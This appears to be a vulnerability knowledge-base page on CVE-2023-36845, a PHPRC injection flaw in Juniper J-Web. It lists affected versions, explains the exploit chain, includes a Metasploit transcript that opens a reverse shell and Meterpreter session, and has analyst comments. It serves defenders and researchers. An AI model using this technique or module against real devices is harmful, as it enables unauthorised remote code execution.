Very High
CVE-2023-36845
CVE-2023-36845
Description
A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series
and SRX Series
allows an unauthenticated, network-based attacker to remotely execute code.
Using a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code.
This issue affects Juniper Networks Junos OS on EX Series
and
SRX Series:
- All versions prior to
20.4R3-S9;
- 21.1 versions 21.1R1 and later;
- 21.2 versions prior to 21.2R3-S7;
- 21.3 versions prior to 21.3R3-S5;
- 21.4 versions prior to 21.4R3-S5;
- 22.1 versions
prior to
22.1R3-S4;
- 22.2 versions
prior to
22.2R3-S2;
- 22.3 versions
prior to
22.3R2-S2, 22.3R3-S1;
- 22.4 versions
prior to
22.4R2-S1, 22.4R3;
- 23.2 versions prior to 23.2R1-S1, 23.2R2.
Add Assessment
Technical Analysis
This might be the most impactful CVSSv3 5.3 rated vulnerability you’ve ever (or never) heard about. The vulnerability affects Juniper’s SRX Firewalls and EX Switches and allows unauthenticated attackers to change environment variables resulting in remote code execution as the nobody user. I’m going to briefly go over the evolution of the research of this vulnerability as I found it interesting.
CVE-2023-36844 + CVE-2023-36845
The Juniper advisory was first analyzed by Sonny at watchtowr and they wrote a great blog outlining how they used this vulnerability along with CVE-2023-36844 in order to obtain RCE. CVE-2023-36844 is an arbitrary file upload function that exploits the do_upload function within the affected device. So what Sonny did was:
Use CVE-2023-36844 to upload a PHP file containing our shellcode
Use CVE-2023-36844 again to upload a second file, containing an auto_prepend_file directive instructing the PHP preprocessor to execute the file we uploaded in step 1
Use bug CVE-2023-36845 to set the PHPRC variable to the file we uploaded in step 2.
Just CVE-2023-36845
Using the clever research published by Sonny, Jacob Baines from Vuln Check posted a blog outlining how RCE can be obtained solely using CVE-2023-36845.
The affected Juniper devices use Appweb web server and when Appweb invokes a CGI script it passes arguments and environment variables in order for the script to access the users’s HTTP request. The body of the HTTP request is passed using stdin. Jacob noted that every FreeBSD process has access to their stdin by opening /dev/fd/0. So by sending an HTTP request, an attacker is able to introduce a “file”, /dev/fd/0 to the system.
So if the attacker set’s PHPRC equal to /dev/fd/0 and then uses the PHP function auto_prepend_file which causes the provided file to be added using the require function, in combination with allow_url_include which allows the use of URL-aware fopen wrappers. The attacker can then set auto_prepend_file equal to data://<payload_goes_here> so that the payload is provided inline and gets executed without ever being written to disk. Very cool.
Try this at home
There’s a great metasploit module available for this that can be found here and can be run like so:
msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set rhosts 192.168.0.247 rhosts => 192.168.0.247 msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set lhost 192.168.0.77 lhost => 192.168.0.77 msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > run [*] Started reverse TCP handler on 192.168.0.77:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable. [*] Sending stage (39927 bytes) to 192.168.0.247 [*] Meterpreter session 4 opened (192.168.0.77:4444 -> 192.168.0.247:58995) at 2023-09-20 16:27:04 -0400 meterpreter > getuid Server username: nobody meterpreter > sysinfoi [-] Unknown command: sysinfoi meterpreter > sysinfo Computer : JUNOS OS : FreeBSD JUNOS JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun 7 23:59:18 PDT 2020 builder@feyrith.juniper.net:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebsd/ Meterpreter : php/freebsd meterpreter >
References
https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/
https://vulncheck.com/blog/juniper-cve-2023-36845
CVSS V3 Severity and Metrics
General Information
Vendors
- juniper
Products
- junos,
- junos 20.4,
- junos 21.1,
- junos 21.2,
- junos 21.3,
- junos 21.4,
- junos 22.1,
- junos 22.2,
- junos 22.3,
- junos 22.4,
- junos 23.2
Metasploit Modules
References
Exploit
A PoC added here by the AKB Worker must have at least 2 GitHub stars.
Miscellaneous
We did an assessment under another CVE from the report (kind of annoying that there are multiple CVEs): https://attackerkb.com/topics/1PKX0CCXkX/cve-2023-36844/rapid7-analysis?referrer=search
Jake’s added twist of not having to drop a PHP file is really cool!
I wish this (and the various blogs published) noted that you wind up in a super-restricted jail.. in my write-up, I did a bit of work on the jail, including outlining one way to escape
The
allow_url_includetrick highlighted here works for EX series devices too, with the addition that you have to POST to an existing .php script path, such as/about.php?PHPRC=...